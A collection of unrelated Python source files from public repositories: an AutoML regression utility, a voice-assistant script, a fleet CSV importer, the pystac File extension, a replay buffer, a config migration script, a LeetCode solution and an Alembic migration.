None:\n X_test = lc.dummy_encode(X_test.copy()).astype(np.float32)\n elif encoding == 'ohe':\n # do this for mixed label-onehot encoding !\n # X_train.reset_index(drop=True, inplace=True)\n # X_test.reset_index(drop=True, inplace=True)\n\n X_train = lc.get_dummies_or_label_encode(\n X_train.copy(), dummy_cols=dummy_cols, \n ohe_dates=ohe_dates).astype(np.float32)\n # print(\"oheencoded X_train['month'] \\n\", X_train[\"Month\"].head(3))\n\n if X_test is not None:\n X_test = lc.get_dummies_or_label_encode(\n X_test.copy(), dummy_cols=dummy_cols, \n ohe_dates=ohe_dates).astype(np.float32)\n\n X_test = eu.reorder_ohencoded_X_test_columns(X_train, X_test)\n else:\n raise ValueError(\n \"%r is not a valid value for var 'encoding', \\n\"\n \"valid values are in ['le', 'ohe']\" % encoding)\n\n print()\n\n if X_train.isnull().values.any():\n X_train = X_train.fillna(X_train.median())\n\n if X_test is not None and X_test.isnull().values.any():\n X_test = X_test.fillna(X_test.median())\n\n print(\"After encoding, first row and output\")\n print(\"X_train\\n\", X_train.head())\n print(\"X_train.columns\\n\", list(X_train.columns))\n print(\"y_train\\n\", y_train.head())\n print()\n\n scalers = (None, None)\n data_and_scalers = {\"scalers\": scalers}\n\n if feat_scaler:\n\n print(\"scaling train and test data\")\n\n scaler = StandardScaler()\n # you're going to perform scaling at training time before finalization\n if not enc_Xy:\n X_train_scaled = scaler.fit_transform(X_train)\n X_train = DataFrame(\n data=X_train_scaled, columns=X_train.columns, index=X_train.index)\n \n print()\n print(\"X_train shape:\", X_train.shape)\n if X_test is not None:\n X_test_scaled = scaler.transform(X_test)\n X_test = DataFrame(\n data=X_test_scaled, columns=X_test.columns, index=X_test.index)\n print(\"X_test shape:\", X_test.shape)\n \n print()\n print(\"After scaling...\")\n print(\"X_train\\n\", X_train[:1])\n print(\"X_train type\", type(X_train))\n if X_test is not None:\n print(\"X_test\\n\", X_test[:1])\n print(\"X_test type\", type(X_test))\n print()\n\n scalers = (scaler, None)\n data_and_scalers[\"scalers\"] = scalers\n\n print(\"scoring:\", scoring)\n # tgt_scaler = False if scoring == 'neg_rmsle' else True\n # standard scaling introduces negative values, \n # which can't be fed to log, hence to rmsle\n\n if tgt_scaler:\n print(\"Scaling target...\")\n\n if scoring != 'neg_rmsle':\n y_scaler = StandardScaler()\n y_train = y_scaler.fit_transform(y_train.values.reshape(-1,1)).ravel()\n else:\n y_scaler = MinMaxScaler()\n y_train = y_scaler.fit_transform(y_train.values.reshape(-1,1))\n\n print(\"y_train and its type\\n\", (y_train[:1], type(y_train)))\n\n if not enc_Xy:\n if scoring != 'neg_rmsle':\n y_test = y_scaler.transform(y_test.values.reshape(-1,1)).ravel()\n else:\n # only transform here: fitting the scaler on test targets would leak test data\n y_test = y_scaler.transform(y_test.values.reshape(-1,1))\n\n print(\"y_test and its type\\n\", (y_test[:3], type(y_test)))\n\n scalers = (scalers[0], y_scaler)\n data_and_scalers[\"scalers\"] = scalers\n\n print()\n\n # this works for classifiers\n # featsel_tuple = eu.create_feature_selector(X_train, None, seed)\n\n if feat_select and X_train.shape[1] > 10:\n\n lsvr = LinearSVR(max_iter=1e4)\n lsvr = lsvr.set_params(\n C=0.01, loss=\"squared_epsilon_insensitive\", dual=False)\n # threshold=[1e-2, 1e-1] or in [\"mean\", \"median\"]\n thsd = \"median\" # \"mean\", \"median\"\n featselector = SelectFromModel(lsvr, threshold=thsd)\n # tscv_fs = TimeSeriesSplit(n_splits=5)\n # featselector = RFECV(lsvr, step=1, cv=tscv_fs)\n\n 
data_and_scalers[\"f_selector\"] = featselector\n\n if not enc_Xy:\n # featselector = featsel_tuple[1]\n X_train_selected = featselector.fit_transform(X_train, y_train)\n xtr_indices = featselector.get_support()\n X_train = DataFrame(\n data=X_train_selected, \n columns=X_train.columns[xtr_indices], \n index=X_train.index)\n\n print(\"After feature selection...\")\n print(\"X_train shape:\", X_train.shape)\n if X_test is not None:\n X_test_selected = featselector.transform(X_test)\n xtt_indices = featselector.get_support()\n X_test = DataFrame(\n data=X_test_selected, \n columns=X_test.columns[xtt_indices], \n index=X_test.index)\n\n print(\"X_test shape:\", X_test.shape)\n\n data_and_scalers[\"data\"] = (X_train, X_test, y_train, y_test) \n \n return data_and_scalers\n\n\ndef create_keras_regressors(input_dim, nb_epoch, batch_size, single_nn=None):\n\n keras_Reg_fcts = dict(\n baseline_nn_default_Reg=(nn.baseline_nn_model, {}),\n baseline_nn_smaller_Reg=(nn.baseline_nn_smaller_model, {}),\n larger_nn_Reg=(nn.larger_nn_model, {}),\n deep_nn_Reg=(nn.deep_nn_model, {}),\n deeper_nn_Reg=(nn.deeper_nn_model, {})\n )\n\n names_and_models = dict()\n\n if single_nn is None:\n \n if input_dim < 15:\n keras_Reg_fcts['larger_deep_nn_Reg'] = (nn.larger_deep_nn_model, {})\n \n for k, v in keras_Reg_fcts.items():\n names_and_models[k] = (KerasRegressor(\n build_fn=v[0], nb_epoch=nb_epoch,\n input_dim=input_dim, batch_size=batch_size,\n verbose=0), {})\n\n elif single_nn is not None and single_nn in keras_Reg_fcts:\n if single_nn=='larger_deep_nn_Reg' and input_dim >= 15:\n print(\n \"input_dim = %d; not advisable to use %s\" % single_nn)\n print(\"Switching to smaller model 'deeper_nn_Reg'\")\n single_nn = 'deeper_nn_Reg'\n else:\n pass\n names_and_models[single_nn] = KerasRegressor(\n build_fn=keras_Reg_fcts[single_nn], nb_epoch=nb_epoch,\n input_dim=input_dim, batch_size=batch_size,\n verbose=0), {}\n else:\n ValueError(\n \"%s is not valid value for 'single_nn', valid values are \"\n \"[None, 'baseline_nn_default_Reg', 'baseline_nn_smaller_Reg'\" \n \"'larger_nn_Reg', 'deep_nn_Reg', 'deeper_nn_Reg', \"\n \"'larger_deep_nn_Reg']\")\n\n return names_and_models\n\n\ndef create_best_keras_reg_architecture(\n keras_reg_name, input_dim, nb_epoch, keras_param_grid):\n \"\"\"\n Tune KerasReg's hyperparameters using Randomized Search CV\n\n ------\n \"\"\"\n\n for n in np.arange(0, 3):\n keras_param_grid[keras_reg_name + '__units_' + str(n)] = sp_randint(\n input_dim, 5*input_dim)\n\n keras_nn_model = KerasRegressor(\n build_fn=nn.tunable_deep_nn, nb_epoch=nb_epoch,\n input_dim=input_dim, verbose=0)\n\n return keras_nn_model, keras_param_grid\n\n\ndef best_regressor_attributes(scoring=None):\n\n best_model_name = 'Worst'\n best_model = None\n best_reg_score = -np.inf\n best_reg_std = np.inf\n\n best_attributes = best_model_name, best_model, best_reg_score, best_reg_std\n\n return best_attributes\n\n\ndef set_features_params_for_model(\n X_train=None, time_dep=False, cv=3, model_name=None, model=None, \n tuning='rscv', params=None, seed=0, nb_epoch=10, eval_phase=True):\n if time_dep:\n if not isinstance(cv, TimeSeriesSplit):\n raise TypeError(\n \"'%r' is not a valid type for time series splitting\\n\"\n \"valid type: 'sklearn.model_selection.TimeSeriesSplit'\" %\n type(cv))\n else:\n if not is_regressor(model):\n if not isinstance(model, KerasRegressor):\n raise TypeError(\n \"non-sklearn regressor should be of type KerasRegressor\")\n\n poly_features = None\n\n if model_name == 'Bagging_SVMReg':\n\n # 
testing phase, ensemble of SVRs w/ linear kernels already set up,\n # but you have to recreate the param grid for hyperparameter opt.\n\n model.set_params(kernel='linear')\n\n n_estimators = 5\n bagging = BaggingRegressor(\n model, max_samples=1.0/n_estimators, n_estimators=n_estimators,\n oob_score=True, random_state=seed)\n\n model = bagging\n\n if eval_phase or tuning == 'rscv':\n params = {\n model_name + '__' +\n k: v for k, v in pgd.Bagging_param_grid.items()}\n \n elif model_name == \"KerasReg\" and not eval_phase:\n\n input_dim = int(X_train.shape[1])\n\n model, params = create_best_keras_reg_architecture(\n model_name, input_dim, model.get_params()['nb_epoch'], \n pgd.Keras_param_grid)\n\n elif model_name in ('baseline_nn_default_Reg', \n 'baseline_nn_smaller_Reg', 'larger_nn_Reg', 'deep_nn_Reg', \n 'deeper_nn_Reg', 'larger_deep_nn_Reg') and not eval_phase:\n \n input_dim = int(X_train.shape[1])\n model, params = create_keras_regressors(\n input_dim, model.get_params()['nb_epoch'], \n model.get_params()['batch_size'], model_name)\n\n elif model_name == \"PolynomialRidgeReg\":\n\n interact_only=False\n if X_train.shape[0] > 100000:\n interact_only=True\n poly_features = PolynomialFeatures(\n degree=5, interaction_only=interact_only)\n try:\n poly_features.fit(X_train)\n except MemoryError as me:\n print(\"MemoryError -- Unable to create polynomial features.\")\n raise(me)\n except Exception as e:\n raise e\n else:\n print(\n \"Successfully created PolynomialFeatures obj.:\", poly_features)\n\n else:\n pass\n\n if not eval_phase:\n # # n_jobs=-2 to avoid burdening your PC\n if hasattr(model, 'n_jobs'):\n print(\"Using all available cores.\")\n model.set_params(n_jobs=-1)\n\n if tuning is None and params is not None:\n print(\"Parameters are useless for testing default/optimized model.\")\n params = None\n\n feats_and_params = (model, cv, tuning, params, poly_features)\n\n return feats_and_params\n\n\ndef save_regressor(\n estimator=None, name='', d_name=None, tuning='NoTuning', serial=0):\n if not serial:\n serial = \"%04d\" % randint(0, 1000)\n\n model_name = name\n\n if d_name is not None:\n name = d_name + \"_\" + name\n\n if tuning is None:\n tuning = 'NoTuning'\n elif tuning == 'rscv':\n pass\n elif tuning not in ('NoTuning', 'rscv'):\n raise ValueError(\n \"%s is not a valid value for variable 'tuning', \"\n \"valid values are ['NoTuning', 'rscv']\" % tuning)\n else:\n raise TypeError(\"'tuning' must be of type 'string'\")\n\n f_name = name + '_' + tuning + '_' + serial\n\n # independent of model name\n # train fcts save pipelines, next v. 
save plain models\n if is_regressor(estimator):\n # can be a sklearn.pipeline(regressor)/regressor\n au.save_model(estimator, f_name + '.pkl')\n elif isinstance(estimator, Pipeline):\n if isinstance(estimator.named_steps[model_name], KerasRegressor):\n keras_f_name = au.create_keras_model_filename(f_name)\n estimator.named_steps[model_name].model.save(keras_f_name + '.h5')\n\n if(len(estimator.steps)) > 1:\n # estimator.named_steps[model_name].model = None\n # or\n # estimator[model_name].model = None\n estimator.steps.pop()\n f_name = name + '_' + tuning + '_for_keras_model_' + serial\n \n au.save_model(estimator, f_name + '.pkl')\n else:\n raise TypeError(\n \"%s is not a sklearn pipeline containing a KerasRegressor \"\n \"nor a KerasRegressor itself\" % model_name)\n # here you could check whether you have plain KerasRegressor...\n else:\n raise TypeError(\n \"%s is neither a sklearn pipeline containing a valid Regressor \"\n \"nor a valid sklearn Regressor itself\" % model_name)\n\n del estimator\n\n print()","repo_name":"SimonCarozza/autolrn","sub_path":"autolrn/regression/r_eval_utils.py","file_name":"r_eval_utils.py","file_ext":"py","file_size_in_byte":16945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}{"seq_id":"16918732951","text":"# Youtube link used for this program: https://youtu.be/AWvsXxDtEkU (creating a virtual assistant by Programming Hero)\n\nimport speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport datetime\nimport wikipedia\nimport pyjokes\n\nlistener = sr.Recognizer ()\nengine = pyttsx3.init ()\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[1].id)\n\ndef talk(text):\n engine.say (text)\n engine.runAndWait ()\n\ndef take_command ():\n command = '' # default in case nothing is recognized\n try:\n with sr.Microphone () as source: # using microphone as the source for the user's command\n listen = \"Listening...\"\n print (listen)\n talk (listen)\n print ()\n voice = listener.listen(source) # the program will listen to what the user is saying\n command = listener.recognize_google(voice)\n command = command.lower()\n if 'alexa' in command: # the program will only continue if it hears the word \"alexa\" during the user's command\n command = command.replace ('alexa', '')\n print (command)\n print ()\n except:\n pass\n return command\n\ndef run_alexa ():\n command = take_command ()\n if 'play' in command: # the virtual assistant will play the song in Youtube with the help of pywhatkit\n song = command.replace ('play', '')\n song_play = 'Playing' + song\n print (song_play)\n print()\n talk (song_play)\n pywhatkit.playonyt (song)\n elif 'time' in command: # the virtual assistant will tell the time (format of time will be in hours:minutes and is stated in 12-hour format instead of 24-hour format (e.g. 12:22 PM))\n time = datetime.datetime.now().strftime('%I:%M %p')\n time_today = \"The current time is \" + time\n print (time_today)\n print()\n talk (time_today)\n elif 'date' in command: # the virtual assistant will tell the date today (format of date will be in \"month\" \"day\", \"year\" (e.g. 
November 19, 2022))\n date = datetime.datetime.now().strftime ('%B %d, %Y')\n date_today = \"The date today is \" + date\n print (date_today)\n print()\n talk (date_today)\n elif 'search for' in command: # the virtual assistant will search for the subject in wikipedia and will give a 2-sentence summary\n search = command.replace ('search for', '')\n wiki_info = wikipedia.summary(search, 2)\n print (wiki_info)\n print()\n talk (wiki_info)\n elif 'how are you' in command: # the virtual assistant will reply to the user if it hears the \"how are you\" phrase\n great = \"I'm doing great today.\"\n print (great)\n print()\n talk (great)\n elif 'free today' in command: # the virtual assistant will reply to the user if it hears the \"free today\" phrase\n free = \"Not really. I still have a lot to do today.\"\n print (free)\n print()\n talk (free)\n elif 'joke' in command: # the virtual assistant will tell the user a joke with the help of pyjokes module\n joke = pyjokes.get_joke()\n print (joke)\n print()\n talk (joke)\n else: # if the user didn't say anything or the assistant didn't hear any of the keywords above\n say = \"I didn't understand that, please say it again.\"\n print (say)\n print ()\n talk (say)\n\nwhile True: # program will loop after each conversation with the virtual assistant\n run_alexa ()","repo_name":"gelaelala/SEATWORK-3-DATA-STRUCTURE-AND-ALGORITHM-BSCOE-2-6","sub_path":"virtual assistant.py","file_name":"virtual assistant.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}{"seq_id":"27371198701","text":"# 0 Type;\n# 1 Available count;\n# 2 Capacity;\n# 3 Price for 1km;\n# 4 Max daily distance;\n# 5 Max delivery points;\n\nimport csv\nimport os\n\nclass FleetTypesImporter:\n def __init__(self, path):\n self.path = os.path.join(os.path.dirname(__file__), path)\n\n def process(self, count):\n self.trucks = {\n 'names': [],\n 'count': [],\n 'maxDeliveryPoints': [],\n 'maxDailyDistances': [],\n 'capacities': [],\n 'rates': [],\n }\n with open(self.path, 'rb') as file:\n reader = csv.reader(file, delimiter = ';')\n file.next()\n for row in reader:\n self.trucks['names'].append(row[0]),\n self.trucks['count'].append(int(row[1]) / count),\n self.trucks['capacities'].append(int(row[2]))\n self.trucks['rates'].append(float(row[3].replace(',', '.')))\n self.trucks['maxDailyDistances'].append(int(row[4]))\n self.trucks['maxDeliveryPoints'].append(int(row[5]))\n return self.trucks\n","repo_name":"czajkovsky/truck-planner","sub_path":"importers/fleet_types_importer.py","file_name":"fleet_types_importer.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"79"}{"seq_id":"32130075007","text":"\"\"\"Implements the File extension.\n\nhttps://github.com/stac-extensions/file\n\"\"\"\n\nfrom typing import Any, Dict, Iterable, List, Optional, Union\n\nimport pystac\nfrom pystac.extensions.base import ExtensionManagementMixin, PropertiesExtension\nfrom pystac.extensions.hooks import ExtensionHooks\nfrom pystac.serialization.identify import (\n OldExtensionShortIDs,\n STACJSONDescription,\n STACVersionID,\n)\nfrom pystac.utils import StringEnum, get_required, map_opt\n\nSCHEMA_URI = \"https://stac-extensions.github.io/file/v2.0.0/schema.json\"\n\nPREFIX = \"file:\"\nBYTE_ORDER_PROP = PREFIX + \"byte_order\"\nCHECKSUM_PROP = PREFIX + \"checksum\"\nHEADER_SIZE_PROP = PREFIX + \"header_size\"\nSIZE_PROP = PREFIX + 
\"size\"\nVALUES_PROP = PREFIX + \"values\"\n\n\nclass ByteOrder(StringEnum):\n \"\"\"List of allows values for the ``\"file:byte_order\"`` field defined by the\n :stac-ext:`File Info Extension `.\"\"\"\n\n LITTLE_ENDIAN = \"little-endian\"\n BIG_ENDIAN = \"big-endian\"\n\n\nclass MappingObject:\n \"\"\"Represents a value map used by assets that are used as classification layers, and\n give details about the values in the asset and their meanings.\"\"\"\n\n properties: Dict[str, Any]\n\n def __init__(self, properties: Dict[str, Any]) -> None:\n self.properties = properties\n\n def apply(self, values: List[Any], summary: str) -> None:\n \"\"\"Sets the properties for this :class:`~MappingObject` instance.\n\n Args:\n values : The value(s) in the file. At least one array element is required.\n summary : A short description of the value(s).\n \"\"\"\n self.values = values\n self.summary = summary\n\n @classmethod\n def create(cls, values: List[Any], summary: str) -> \"MappingObject\":\n \"\"\"Creates a new :class:`~MappingObject` instance.\n\n Args:\n values : The value(s) in the file. At least one array element is required.\n summary : A short description of the value(s).\n \"\"\"\n m = cls({})\n m.apply(values=values, summary=summary)\n return m\n\n @property\n def values(self) -> List[Any]:\n \"\"\"Gets or sets the list of value(s) in the file. At least one array element is\n required.\"\"\"\n return get_required(self.properties.get(\"values\"), self, \"values\")\n\n @values.setter\n def values(self, v: List[Any]) -> None:\n self.properties[\"values\"] = v\n\n @property\n def summary(self) -> str:\n \"\"\"Gets or sets the short description of the value(s).\"\"\"\n return get_required(self.properties.get(\"summary\"), self, \"summary\")\n\n @summary.setter\n def summary(self, v: str) -> None:\n self.properties[\"summary\"] = v\n\n @classmethod\n def from_dict(cls, d: Dict[str, Any]) -> \"MappingObject\":\n return cls.create(**d)\n\n def to_dict(self) -> Dict[str, Any]:\n return self.properties\n\n\nclass FileExtension(\n PropertiesExtension, ExtensionManagementMixin[Union[pystac.Item, pystac.Collection]]\n):\n \"\"\"A class that can be used to extend the properties of an :class:`~pystac.Asset`\n with properties from the :stac-ext:`File Info Extension `.\n\n To create an instance of :class:`FileExtension`, use the\n :meth:`FileExtension.ext` method. For example:\n\n .. 
code-block:: python\n\n >>> asset: pystac.Asset = ...\n >>> file_ext = FileExtension.ext(asset)\n \"\"\"\n\n asset_href: str\n \"\"\"The ``href`` value of the :class:`~pystac.Asset` being extended.\"\"\"\n\n properties: Dict[str, Any]\n \"\"\"The :class:`~pystac.Asset` fields, including extension properties.\"\"\"\n\n additional_read_properties: Optional[Iterable[Dict[str, Any]]] = None\n \"\"\"If present, this will be a list containing 1 dictionary representing the\n properties of the owning :class:`~pystac.Item`.\"\"\"\n\n def __init__(self, asset: pystac.Asset):\n self.asset_href = asset.href\n self.properties = asset.extra_fields\n if asset.owner and isinstance(asset.owner, pystac.Item):\n self.additional_read_properties = [asset.owner.properties]\n\n def __repr__(self) -> str:\n return \"<AssetFileExtension Asset href={}>\".format(self.asset_href)\n\n def apply(\n self,\n byte_order: Optional[ByteOrder] = None,\n checksum: Optional[str] = None,\n header_size: Optional[int] = None,\n size: Optional[int] = None,\n values: Optional[List[MappingObject]] = None,\n ) -> None:\n \"\"\"Applies file extension properties to the extended Item.\n\n Args:\n byte_order : Optional byte order of integer values in the file. One of\n ``\"big-endian\"`` or ``\"little-endian\"``.\n checksum : Optional multihash for the corresponding file,\n encoded as hexadecimal (base 16) string with lowercase letters.\n header_size : Optional header size of the file, in bytes.\n size : Optional size of the file, in bytes.\n values : Optional list of :class:`~MappingObject` instances that lists the\n values that are in the file and describe their meaning. See the\n :stac-ext:`Mapping Object <mapping-object>` docs for an example.\n If given, at least one array element is required.\n \"\"\"\n self.byte_order = byte_order\n self.checksum = checksum\n self.header_size = header_size\n self.size = size\n self.values = values\n\n @property\n def byte_order(self) -> Optional[ByteOrder]:\n \"\"\"Gets or sets the byte order of integer values in the file. One of big-endian\n or little-endian.\"\"\"\n return self._get_property(BYTE_ORDER_PROP, ByteOrder)\n\n @byte_order.setter\n def byte_order(self, v: Optional[ByteOrder]) -> None:\n self._set_property(BYTE_ORDER_PROP, v)\n\n @property\n def checksum(self) -> Optional[str]:\n \"\"\"Gets or sets the multihash for the corresponding file, encoded as hexadecimal\n (base 16) string with lowercase letters.\"\"\"\n return self._get_property(CHECKSUM_PROP, str)\n\n @checksum.setter\n def checksum(self, v: Optional[str]) -> None:\n self._set_property(CHECKSUM_PROP, v)\n\n @property\n def header_size(self) -> Optional[int]:\n \"\"\"Gets or sets the header size of the file, in bytes.\"\"\"\n return self._get_property(HEADER_SIZE_PROP, int)\n\n @header_size.setter\n def header_size(self, v: Optional[int]) -> None:\n self._set_property(HEADER_SIZE_PROP, v)\n\n @property\n def size(self) -> Optional[int]:\n \"\"\"Gets or sets the size of the file, in bytes.\"\"\"\n return self._get_property(SIZE_PROP, int)\n\n @size.setter\n def size(self, v: Optional[int]) -> None:\n self._set_property(SIZE_PROP, v)\n\n @property\n def values(self) -> Optional[List[MappingObject]]:\n \"\"\"Gets or sets the list of :class:`~MappingObject` instances that lists the\n values that are in the file and describe their meaning. See the\n :stac-ext:`Mapping Object <mapping-object>` docs for an example. 
If given,\n at least one array element is required.\"\"\"\n return map_opt(\n lambda values: [\n MappingObject.from_dict(mapping_obj) for mapping_obj in values\n ],\n self._get_property(VALUES_PROP, List[Dict[str, Any]]),\n )\n\n @values.setter\n def values(self, v: Optional[List[MappingObject]]) -> None:\n self._set_property(\n VALUES_PROP,\n map_opt(\n lambda values: [mapping_obj.to_dict() for mapping_obj in values], v\n ),\n )\n\n @classmethod\n def get_schema_uri(cls) -> str:\n return SCHEMA_URI\n\n @classmethod\n def ext(cls, obj: pystac.Asset, add_if_missing: bool = False) -> \"FileExtension\":\n \"\"\"Extends the given STAC Object with properties from the :stac-ext:`File Info\n Extension <file>`.\n\n This extension can be applied to instances of :class:`~pystac.Asset`.\n \"\"\"\n if isinstance(obj, pystac.Asset):\n cls.validate_owner_has_extension(obj, add_if_missing)\n return cls(obj)\n else:\n raise pystac.ExtensionTypeError(\n f\"File Info extension does not apply to type '{type(obj).__name__}'\"\n )\n\n\nclass FileExtensionHooks(ExtensionHooks):\n schema_uri: str = SCHEMA_URI\n prev_extension_ids = {\"file\"}\n stac_object_types = {pystac.STACObjectType.ITEM}\n\n def migrate(\n self, obj: Dict[str, Any], version: STACVersionID, info: STACJSONDescription\n ) -> None:\n # The checksum field was previously its own extension.\n old_checksum: Optional[Dict[str, str]] = None\n if info.version_range.latest_valid_version() < \"v1.0.0-rc.2\":\n if OldExtensionShortIDs.CHECKSUM.value in info.extensions:\n old_item_checksum = obj[\"properties\"].get(\"checksum:multihash\")\n if old_item_checksum is not None:\n if old_checksum is None:\n old_checksum = {}\n old_checksum[\"__item__\"] = old_item_checksum\n for asset_key, asset in obj[\"assets\"].items():\n old_asset_checksum = asset.get(\"checksum:multihash\")\n if old_asset_checksum is not None:\n if old_checksum is None:\n old_checksum = {}\n old_checksum[asset_key] = old_asset_checksum\n\n try:\n obj[\"stac_extensions\"].remove(OldExtensionShortIDs.CHECKSUM.value)\n except ValueError:\n pass\n\n super().migrate(obj, version, info)\n\n if old_checksum is not None:\n if SCHEMA_URI not in obj[\"stac_extensions\"]:\n obj[\"stac_extensions\"].append(SCHEMA_URI)\n for key in old_checksum:\n if key == \"__item__\":\n obj[\"properties\"][CHECKSUM_PROP] = old_checksum[key]\n else:\n obj[\"assets\"][key][CHECKSUM_PROP] = old_checksum[key]\n\n\nFILE_EXTENSION_HOOKS: ExtensionHooks = FileExtensionHooks()\n","repo_name":"stac-utils/qgis-stac-plugin","sub_path":"src/qgis_stac/lib/pystac/extensions/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":10106,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"79"}{"seq_id":"25991328141","text":"\"\"\"Simple replay buffer\nRef: https://github.com/openai/baselines/blob/master/baselines/deepq/replay_buffer.py\n\"\"\"\nimport numpy as np\n\n\nclass ReplayBuffer(object):\n def __init__(self):\n self.storage = []\n\n def __len__(self):\n return len(self.storage)\n\n def clear(self):\n self.storage.clear()\n assert len(self.storage) == 0\n\n def sync(self, memory):\n self.clear()\n for exp in memory.storage:\n self.storage.append(exp)\n\n assert len(memory) == len(self.storage)\n\n def add(self, data):\n # Expects tuples of (state, next_state, action, reward, done)\n if len(self.storage) > 1.5e5:\n self.storage.pop(0)\n self.storage.append(data)\n\n def sample(self, batch_size):\n ind = np.random.randint(0, len(self.storage), size=batch_size)\n x_gridmap, 
x_theta = [], []\n y_gridmap, y_theta = [], []\n u, r, d = [], [], []\n\n for i in ind: \n X, Y, U, R, D = self.storage[i]\n\n x_gridmap.append(np.array(X[\"gridmap\"], copy=False))\n x_theta.append(np.array(X[\"theta\"], copy=False))\n\n y_gridmap.append(np.array(Y[\"gridmap\"], copy=False))\n y_theta.append(np.array(Y[\"theta\"], copy=False))\n\n u.append(np.array(U, copy=False))\n r.append(np.array(R, copy=False))\n d.append(np.array(D, copy=False))\n\n x_gridmap = np.array(x_gridmap)\n x_theta = np.array(x_theta)\n\n y_gridmap = np.array(y_gridmap)\n y_theta = np.array(y_theta)\n\n x = {\"gridmap\": x_gridmap, \"theta\": x_theta}\n y = {\"gridmap\": y_gridmap, \"theta\": y_theta}\n\n return \\\n x, y, np.asarray(u, dtype=np.int64).reshape(-1, 1), \\\n np.array(r).reshape(-1, 1), np.array(d).reshape(-1, 1)\n","repo_name":"mit-acl/dc2g","sub_path":"rl_baseline/misc/replay_buffer.py","file_name":"replay_buffer.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"} +{"seq_id":"44619432723","text":"from json import loads, dumps\n\n\ndef test_app():\n s = \"\"\"\n {\n \"base_version\": 1,\n \"uuid\": \"c31de18d-b56e-41b9-b43b-a1c6d69ec6a0\",\n \"info\": {\n \"app_name\": \"1Password\",\n \"config_version\": 1,\n \"url\": \"https://play.google.com/store/apps/details?id=com.agilebits.onepassword\"\n },\n \"app_config\": {\n \"hub_info\": {\n \"hub_uuid\": \"65c2f60c-7d08-48b8-b4ba-ac6ee924f6fa\"\n },\n \"target_checker\": {\n \"api\": \"App_Package\",\n \"extra_string\": \"com.agilebits.onepassword\"\n }\n }\n}\n \"\"\"\n print(migration_1_2_app(s))\n\n\ndef test_hub():\n s = \"\"\"\n {\n \"base_version\": 5,\n \"uuid\": \"6a6d590b-1809-41bf-8ce3-7e3f6c8da945\",\n \"info\": {\n \"hub_name\": \"F-droid\",\n \"config_version\": 2\n },\n \"api_keywords\": [\"android_app_package\"],\n \"app_url_templates\": [\n \"https://f-droid.org/%language/packages/%android_app_package/\",\n \"https://f-droid.org/packages/%android_app_package/\"\n ]\n}\n \"\"\"\n print(migration_5_6_hub(s))\n\n\ndef migration_1_2_app(s: str) -> str or None:\n old_json = loads(s)\n if old_json[\"base_version\"] != 1:\n raise KeyError\n target = old_json[\"app_config\"][\"target_checker\"]\n extra_map = {__api_constant(target[\"api\"]): target[\"extra_string\"]}\n new_json = {\n \"base_version\": 2,\n \"config_version\": old_json[\"info\"][\"config_version\"],\n \"uuid\": old_json[\"uuid\"],\n \"base_hub_uuid\": old_json[\"app_config\"][\"hub_info\"][\"hub_uuid\"],\n \"info\": {\n \"name\": old_json[\"info\"][\"app_name\"],\n \"url\": old_json[\"info\"][\"url\"],\n \"extra_map\": extra_map,\n },\n }\n return dumps(new_json, indent=2, ensure_ascii=False)\n\n\ndef __api_constant(_s: str) -> str or None:\n s = _s.lower()\n if s == \"app_package\":\n return \"android_app_package\"\n elif s == \"magisk_module\":\n return \"android_magisk_module\"\n elif s == \"shell\":\n return \"android_custom_shell\"\n elif s == \"shell_root\":\n return \"android_custom_shell_root\"\n else:\n return\n\n\ndef migration_5_6_hub(s: str) -> str or None:\n old_json = loads(s)\n if old_json[\"base_version\"] != 5:\n raise KeyError\n new_json = {\n \"base_version\": 6,\n \"config_version\": old_json[\"info\"][\"config_version\"],\n \"uuid\": old_json[\"uuid\"],\n \"info\": {\n \"hub_name\": old_json[\"info\"][\"hub_name\"],\n \"hub_icon_url\": \"\"\n },\n \"target_check_api\": \"\",\n \"api_keywords\": old_json[\"api_keywords\"],\n \"app_url_templates\": 
old_json[\"app_url_templates\"],\n }\n return dumps(new_json, indent=2, ensure_ascii=False)\n","repo_name":"DUpdateSystem/UpgradeAll-rules","sub_path":"scripts/migration/migration_1_2.py","file_name":"migration_1_2.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"7"} +{"seq_id":"43191510637","text":"class Solution:\n def findDifference(self, nums1: List[int], nums2: List[int]) -> List[List[int]]:\n nums1_set = set(nums1)\n nums2_set = set(nums2)\n\n ret1, ret2 = set(), set()\n for i in range(len(nums1)):\n if nums1[i] not in nums2_set:\n ret1.add(nums1[i])\n\n for i in range(len(nums2)):\n if nums2[i] not in nums1_set:\n ret2.add(nums2[i])\n\n return [list(ret1), list(ret2)]\n\n ","repo_name":"qtsky89/leetcode","sub_path":"find-the-difference-of-two-arrays/find-the-difference-of-two-arrays.py","file_name":"find-the-difference-of-two-arrays.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21487121955","text":"\"\"\"add target template\n\nRevision ID: 9eb38607305e\nRevises: c4ba5403c197\nCreate Date: 2023-07-08 23:26:39.924649\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlalchemy_utils\n\n\n# revision identifiers, used by Alembic.\nrevision = '9eb38607305e'\ndown_revision = 'c4ba5403c197'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('target_cnt_template',\n sa.Column('template_id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('name', sa.String(length=32), nullable=True),\n sa.Column('description', sa.String(length=128), nullable=True),\n sa.Column('value', sa.Numeric(precision=8), nullable=True),\n sa.Column('currency', sqlalchemy_utils.types.currency.CurrencyType(length=3), nullable=True),\n sa.PrimaryKeyConstraint('template_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! 
